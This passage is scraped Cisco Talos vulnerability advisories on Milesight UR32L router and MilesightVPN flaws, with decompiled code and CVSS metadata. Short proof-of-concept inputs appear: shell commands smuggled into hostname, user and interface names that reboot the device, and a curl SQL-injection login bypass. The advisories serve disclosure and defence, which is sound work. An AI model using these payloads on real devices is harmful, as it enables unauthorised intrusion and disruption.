This command is in the sub-menu reachable through the `configure terminal` command:\n \n \n ROUTER# configure terminal \n ROUTER(config)# \n [...]\n hostname Set system's network name\n [...]\n \n\nThe `libzebra.so.0.0.0`\u2019s `hostname_command` function is responsible for managing the `hostname` command:\n \n \n undefined4 hostname_command(undefined4 param_1,int param_2,undefined4 param_3,byte **argv)\n \n {\n undefined4 uVar1;\n char *pcVar2;\n \n if (0x19 < (**argv | 0x20) - 0x61) {\n [...]\n }\n uVar1 = change_hostname_wrap(argv);\n return uVar1;\n }\n \n\nThis function checks only that the provided hostname starts with a letter of the alphabet (the `(**argv | 0x20) - 0x61` expression folds the first character to lowercase and tests whether it falls in the range `a`-`z`), then calls `change_hostname_wrap` with the new hostname. `change_hostname_wrap` checks whether the current hostname differs from the new one and, if so, eventually calls `change_hostname`:\n \n \n void change_hostname(char *new_hostname)\n \n {\n int iVar1;\n char change_hostname_command [128];\n \n iVar1 = __stack_chk_guard;\n change_hostname_command._0_4_ = 0;\n memset(change_hostname_command + 4,0,0xfc);\n snprintf(change_hostname_command,0x100,\"uci set system.@system[0].hostname='%s';uci commit\",\n new_hostname); [1]\n system(change_hostname_command); [2]\n [...]\n }\n \n\nThis function composes, at `[1]`, the `uci set system.@system[0].hostname='<new_hostname>';uci commit` string. The composed string is then executed, at `[2]`, using the `system` function. 
The `change_hostname` function is vulnerable to command injection: the `new_hostname` parameter reaches the `system` function unmodified, and the only check the `hostname` command performs, that the first character is alphabetic, is not enough to prevent a command injection.\n\n### Exploit Proof of Concept\n\nFollowing is a POC triggering a reboot of the system through the command injection exposed above:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> enable\n ROUTER# configure terminal\n ROUTER(config)# hostname a'$(reboot)'\n old hostname null\n a(config)# Connection closed by foreign host.\n \n\nThe `Connection closed by foreign host.` message is the consequence of the device rebooting.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. 
See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1698\n\nPrevious Report\n\nTALOS-2023-1711\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L libzebra.so change_hostname OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22659"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1699", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1699", "cvss": {"score": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:37", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1701\n\n## Milesight MilesightVPN requestHandlers.js LoginAuth SQL injection vulnerability\n\n##### July 6, 
2023\n\n##### CVE Number\n\nCVE-2023-22319\n\n##### SUMMARY\n\nA SQL injection vulnerability exists in the requestHandlers.js LoginAuth functionality of Milesight VPN v2.0.2. A specially crafted network request can lead to authentication bypass. An attacker can send a malicious packet to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight VPN v2.0.2\n\n##### PRODUCT URLS\n\nMilesightVPN - <https://www.milesight-iot.com/milesightvpn/>\n\n##### CVSSv3 SCORE\n\n7.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n\n##### CWE\n\nCWE-89 - Improper Neutralization of Special Elements used in an SQL Command (\u2018SQL Injection\u2019)\n\n##### DETAILS\n\nMilesightVPN is software that simplifies setting up the VPN tunnel for Milesight products and allows monitoring of the connection status through a web interface.\n\nMilesightVPN allows managing the various VPN-related configuration and the connected devices through its web interface. 
The web interface is protected by a login; checking the correctness of the provided credentials is the responsibility of the `LoginAuth` function in `requestHandlers.js`:\n \n \n function LoginAuth(res,postdata,connection){\n console.info('#######log.node:loginauth start');\n var sha512=crypto.createHash('sha512');\n sha512.update(postdata.pwd);\n var pwd=sha512.digest('hex');\n $sql=\"select * from user where user='\"+postdata.user+\"' and passwd='\"+pwd+\"'\"; [1]\n connection.query($sql).then(function(data){ [2]\n var result={};\n if(data['error'])\n {\n [...]\n }\n else\n {\n if(data['result'].length>0)\n {\n var dt=data['result'];\n result['status']=1;\n var token=generateToken(dt[0]['user']);\n var exp=new Date(new Date().getTime()+expiretime*1000).toUTCString();\n res.setHeader('Set-Cookie',['token='+token]);\n console.info('#######log.node:loginauth success');\n res.write(JSON.stringify(result));\n res.end();\n }\n else\n {\n [...]\n }\n }\n });\n }\n \n\nThe function composes, at `[1]`, the SQL query that checks whether the provided username and password correspond to an existing user. Then, at `[2]`, the query is executed; if the resulting table is not empty, a JWT for the matched user is crafted and placed in the response header as the value of `Set-Cookie`.\n\nThis function is vulnerable to SQL injection: the query string is built through string concatenation instead of a prepared statement. 
This SQL injection can lead to an authentication bypass.\n\n### Exploit Proof of Concept\n\nFollowing is a POC that demonstrates the SQL injection in the login procedure discussed above:\n \n \n curl -i -k -d \"user=admin' -- &pwd=POC\" -X POST https://<SERVER_ADDRESS>/LoginAuth \n \n HTTP/1.1 200 OK\n Set-Cookie: token=<redacted>\n Date: [...]\n Connection: keep-alive\n Transfer-Encoding: chunked\n \n {\"status\":1}\n \n\nThe `{\"status\":1}` response shows that the login procedure found a match for the data provided.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1700\n\nPrevious Report\n\nTALOS-2023-1702\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight MilesightVPN requestHandlers.js LoginAuth SQL injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22319"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1701", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1701", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:38", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1694\n\n## Milesight UR32L ys_thirdparty user_delete OS command injection vulnerability\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-23550\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the ys_thirdparty user_delete functionality of Milesight UR32L v32.3.0.5. A specially crafted network packet can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-77 - Improper Neutralization of Special Elements used in a Command (\u2018Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the router console. 
This is an interactive shell to modify the router settings.\n\nHere is the prompt after the login:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> \n \n\nThe service has several functionalities. The number of functionalities depends on the user privileges. The admin user can access the `enable` command, which will allow access to a high privilege command menu:\n \n \n ROUTER> enable \n ROUTER# \n cellular-gps-dev\n clear Reset functions\n configure Configuration from vty interface\n copy Copy from one file to another\n core Set debug level\n debug Debugging functions (see also 'undebug')\n disable Turn off privileged mode command\n enable Turn on privileged mode command\n end End current mode and change to enable mode\n exit Exit current mode and down to previous mode\n list Print command list\n modbus-master\n no Negate a command or set its defaults\n ping Send echo messages\n quit Exit current mode and down to previous mode\n reload Halt and perform a cold restart\n show Show running system information\n ssh Open an ssh connection\n telnet Open a telnet connection\n terminal Set terminal line parameters\n test Test\n traceroute Trace route to destination\n undebug Disable debugging functions (see also 'debug')\n write Write running configuration to memory, network, or terminal\n \n\nIssuing the `configure terminal` command makes it possible to access the `user_permission` command. 
This allows access to a menu where it is possible to manage user-related information:\n \n \n ROUTER(user-permission)# \n end End current mode and change to enable mode\n exit Exit current mode and down to previous mode\n list Print command list\n no remove the user\n show show the user information\n superuser set superuser name or password\n user check the user password\n \n\nThe `no user <username>` command removes the user associated with the issued username. This command is managed by the `ys_thirdparty`\u2019s `user_delete` function:\n \n \n undefined4 user_delete(undefined4 param_1,undefined4 param_2,undefined4 param_3,char **argv)\n \n {\n [... variable declaration ...]\n \n username = *argv;\n iVar1 = strcmp(username,superuser);\n if (iVar1 == 0) {\n username = \"[failed]:can not remove superuser!\\n\";\n }\n else {\n iVar1 = delete_user_real(username,0);\n [...]\n }\n [...]\n }\n \n\nIf the username provided is not the superuser, this function will call the `delete_user_real` function:\n \n \n uint delete_user_real(char *username,uint is_delete_super_user)\n \n {\n [... variable declaration ...]\n \n [...]\n is_superuser = strcmp(username,superuser);\n if ((is_superuser | is_delete_super_user) == 0) {\n tmp_var = 1;\n }\n else {\n [...]\n tmp_var = check_system_user(username);\n [...]\n }\n [...]\n }\n \n\nAfter its own superuser check, this function may call `check_system_user` with the provided username:\n \n \n void check_system_user(char *user)\n \n {\n [... variable declaration ...]\n \n iVar1 = __stack_chk_guard;\n popen_command._0_4_ = 0;\n memset(popen_command + 4,0,0xfc);\n snprintf(popen_command,0x100,\"%s chk 0 %s\",\"/usr/sbin/userpermit.sh\",user); [1]\n __stream = popen(popen_command,\"r\"); [2]\n [...]\n }\n \n\nThis function composes, at `[1]`, the `\"/usr/sbin/userpermit.sh chk 0 <username>\"` string and uses it as the argument of the `popen` function at `[2]`. 
From the `user_delete` function to the `popen` call at `[2]` there is no check on the provided username, so this leads to a command injection vulnerability at `[2]`.\n\n### Exploit Proof of Concept\n\nFollowing is a POC triggering a reboot of the system through the command injection exposed above:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> enable\n ROUTER# configure terminal\n ROUTER(config)# user_permission\n ROUTER(user-permission)# no user `reboot`\n ROUTER(user-permission)# Connection closed by foreign host.\n \n\nThe `Connection closed by foreign host.` message is the consequence of the device rebooting.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. 
See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1706\n\nPrevious Report\n\nTALOS-2023-1698\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L ys_thirdparty user_delete OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-23550"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1694", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1694", "cvss": {"score": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:39", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1698\n\n## Milesight UR32L libzebra.so bridge_group OS command injection vulnerability\n\n##### July 6, 
2023\n\n##### CVE Number\n\nCVE-2023-22306\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the libzebra.so bridge_group functionality of Milesight UR32L v32.3.0.5. A specially crafted network packet can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-77 - Improper Neutralization of Special Elements used in a Command (\u2018Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the router console. This is an interactive shell to modify the router settings.\n\nHere is the prompt after the login:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> \n \n\nThe service has several functionalities. The number of functionalities depends on the user privileges. 
Indeed, the admin user can access the `enable` command, which will allow access to a high privilege command menu:\n \n \n ROUTER> enable \n ROUTER# \n cellular-gps-dev\n clear Reset functions\n configure Configuration from vty interface\n copy Copy from one file to another\n core Set debug level\n debug Debugging functions (see also 'undebug')\n disable Turn off privileged mode command\n enable Turn on privileged mode command\n end End current mode and change to enable mode\n exit Exit current mode and down to previous mode\n list Print command list\n modbus-master\n no Negate a command or set its defaults\n ping Send echo messages\n quit Exit current mode and down to previous mode\n reload Halt and perform a cold restart\n show Show running system information\n ssh Open an ssh connection\n telnet Open a telnet connection\n terminal Set terminal line parameters\n test Test\n traceroute Trace route to destination\n undebug Disable debugging functions (see also 'debug')\n write Write running configuration to memory, network, or terminal\n \n\nIssuing the `configure terminal` command permits access to the `interface <interface_name>` command that configures a network interface. Several configuration options are available for an interface; one of them is the `bridge-group <1-10>` command, which adds the interface to a bridge.\n\nAn example of using this functionality follows:\n \n \n ROUTER> enable \n ROUTER# configure terminal \n ROUTER(config)# interface eth4\n ROUTER(config-if)# bridge-group 2\n \n\nThis adds eth4 to bridge number 2. The function responsible for managing the `bridge-group` command is the `libzebra.so.0.0.0`\u2019s `bridge_group` function:\n \n \n void bridge_group(undefined4 param_1,interface_struct *interface_struct,undefined4 param_3,\n char **argv)\n \n {\n [... 
variable declaration ...]\n \n puVar6 = (undefined4 *)0x0;\n local_2c = __stack_chk_guard;\n interface_name = interface_struct->interface_name; [1]\n bridge_group_n = atoi(*argv);\n piVar5 = (int *)0x0;\n memset(ifconfig_command,0,0x40);\n snprintf(ifconfig_command,0x40,\"ifconfig %s 0.0.0.0\",interface_name); [2]\n system(ifconfig_command); [3]\n [...]\n }\n \n\nAt `[1]`, the `<interface_name>` provided is fetched (in the example above, it is eth4). At `[2]` the `ifconfig <interface_name> 0.0.0.0` string is composed and then used as the argument of the `system` function at `[3]`. Because the `<interface_name>` is eventually used in the `system` function, the `bridge_group` function is vulnerable to command injection.\n\n### Exploit Proof of Concept\n\nFollowing is a POC that triggers a reboot of the system through the command injection described above:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> enable \n ROUTER# configure terminal \n ROUTER(config)# interface `reboot`\n ROUTER(config-if)# bridge-group 2\n bridge.c:366 bridge_group: use command 'bridge <1-10>' to creates a new ethernet bridge!\n ROUTER(config-if)# Connection closed by foreign host.\n \n\nThe `Connection closed by foreign host.` message is the consequence of the device rebooting.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90-day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. 
See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1694\n\nPrevious Report\n\nTALOS-2023-1699\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L libzebra.so bridge_group OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22306"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1698", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1698", "cvss": {"score": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:35", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1703\n\n## Milesight MilesightVPN liburvpn.so create_private_key OS command injection vulnerability\n\n##### 
July 6, 2023\n\n##### CVE Number\n\nCVE-2023-22371\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the liburvpn.so create_private_key functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to command execution. An attacker can send a malicious packet to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight VPN v2.0.2\n\n##### PRODUCT URLS\n\nMilesightVPN - <https://www.milesight-iot.com/milesightvpn/>\n\n##### CVSSv3 SCORE\n\n8.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - chain: TALOS-2023-1702 \n##### CWE\n\nCWE-77 - Improper Neutralization of Special Elements used in a Command (\u2018Command Injection\u2019)\n\n##### DETAILS\n\nMilesightVPN is software that simplifies the setup of VPN tunnels for Milesight products and allows the connection status to be monitored through a web server interface.\n\nThe MilesightVPN exposes the `/Device_Auth` API, which the various Milesight devices use to authenticate to the server and to obtain an OpenVPN configuration. The API is managed by the `Device_Auth` function:\n \n \n function Device_Auth(res,postdata,connection){\n var authcode=postdata['authcode'],subnet=postdata['subnet'],\\\n devicename=postdata['device_name'],sn=postdata['sn'];\n var newdt=dll_fun('get_openvpn_params',{});\n [...]\n if(newdt['result']['auth_code']!=authcode)\n {\n [...]\n }\n else\n {\n var $sql='select * from device where sn=\"'+sn+'\"';\n connection.query($sql).then(function(data){\n if(data['error'])\n {\n [... 
error branch ...]\n }\n else\n {\n if(data['result'].length>0)\n {\n [...]\n }\n else\n {\n [...]\n $sql1='insert into device(name,sn,remote_subnet,status) \\\n value(\"'+devicename+'\",\"'+sn+'\",\"'+subnet+'\",0)';\n connection.query($sql1).then(function(data1){\n if(data1['error'])\n {\n [...]\n }\n else\n {\n var newdt3=dll_fun('register_client',{'cn':sn,'subnet':subnet}); [1]\n [...]\n }\n })\n }\n }\n })\n }\n }\n \n\nThis API expects four entries in the POST payload:\n\n- authcode: a secret generated by the MilesightVPN\n- subnet: the subnet mask of the main network used by the device\n- device_name: the identifier of the device that is connecting to the MilesightVPN server\n- sn: the serial number of the device that is connecting to the MilesightVPN server\n\nEventually the function will reach the code at `[1]`, which calls a function of the `liburvpn.so` library. In this case the function called is `liburvpn.so`\u2019s `register_a_client`, which takes one JSON object as argument; the object has the `sn` and the `subnet` as entry values.\n\nFollowing is the `liburvpn.so`\u2019s `register_a_client` function:\n \n \n cJSON * register_a_client(cJSON *params)\n \n {\n [... variable declaration ...]\n \n [... 
variable initialization ...]\n for (obj = params->child; obj != (cJSON *)0x0; obj = obj->next) {\n iVar1 = strcmp(obj->string,\"cn\");\n if (iVar1 == 0) {\n common_name = obj->valuestring;\n }\n else {\n iVar1 = strcmp(obj->string,\"subnet\");\n if (iVar1 == 0) {\n subnet = obj->valuestring;\n }\n }\n }\n if ((common_name == (char *)0x0) || (subnet == (char *)0x0)) {\n [...]\n }\n else {\n [...]\n type = check_common_name(common_name);\n if (type == 0) {\n device_max = get_clients_limit();\n snprintf(cmd,0x80,\"echo \\\"device max:%d\\\" >> /var/urvpn.log\",(ulong)(uint)device_max);\n system(cmd);\n print_timestamp();\n printf(\"Register a router(%s)\\n\",common_name);\n [...]\n update_subnet(common_name,subnet);\n ret = register_a_router(common_name,ip,mask); [2]\n }\n [...]\n }\n [...]\n }\n \n\nThe function will perform various checks and eventually, if no error is encountered and the device is recognized as a router, the function `register_a_router`, at `[2]`, will be called. The `register_a_router` function will generate the cryptographic keys used for the VPN connection.\n \n \n int register_a_router(char *cn,char *ip,char *mask)\n \n {\n [...]\n iVar1 = general_keys(\"./urvpn/routers_ca\",cn);\n return iVar1;\n }\n \n\nThe `register_a_router` function will call the `general_keys` function, which is the one that effectively generates the cryptographic keys:\n \n \n int general_keys(char *path,char *name)\n \n {\n [... 
variable declaration ...]\n \n \n is_name_0_string = strcmp(name,\"000000000000\");\n if (is_name_0_string == 0) {\n [...]\n }\n else {\n snprintf(public_name,0x200,\"%s/%s.csr\",path,name);\n snprintf(private_name,0x200,\"%s/%s.key\",path,name);\n snprintf(certificate_name,0x200,\"%s/%s.crt\",path,name);\n }\n private_name_path_exists = check_file_exist(private_name); [3]\n if (private_name_path_exists == 0) {\n print_timestamp();\n printf(\"create file private %s\\n\",private_name);\n create_private_key(private_name); [4]\n }\n [...]\n }\n \n\nThis function receives the original `sn`, the serial number of the device, as its `name` parameter. If this is not `000000000000`, various path names are composed. We are going to focus on the `private_name` variable, which takes the form `./urvpn/routers_ca/<serial number>`. At `[3]` it is checked whether this path name corresponds to an existing file; if the file does not exist, the `create_private_key` function is called at `[4]`:\n \n \n void create_private_key(char *private_name)\n \n {\n [...]\n snprintf(cmd,0x200,\"openssl genrsa -out %s 1024\",private_name); [5]\n print_timestamp();\n printf(\"create private key:%s\\n\",cmd);\n system(cmd);\n [...]\n }\n \n\nThis function, for the code path considered, will execute `system(\"openssl genrsa -out ./urvpn/routers_ca/<serial number> 1024\");`. Because the serial number variable, originally `sn` and then called `cn` in the `liburvpn.so` library, is never checked before reaching `[5]`, the `/Device_Auth` API can lead to an OS command injection in `liburvpn.so` at `[5]`. An attacker would need to know the Authorization Code of the server to actually use the `/Device_Auth` API. 
However, because of TALOS-2023-1702, this information can easily be retrieved by an attacker.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90-day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1704\n\nPrevious Report\n\nTALOS-2023-1700\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight MilesightVPN liburvpn.so create_private_key OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22371"], "modified": "2023-07-06T00:00:00", "id": 
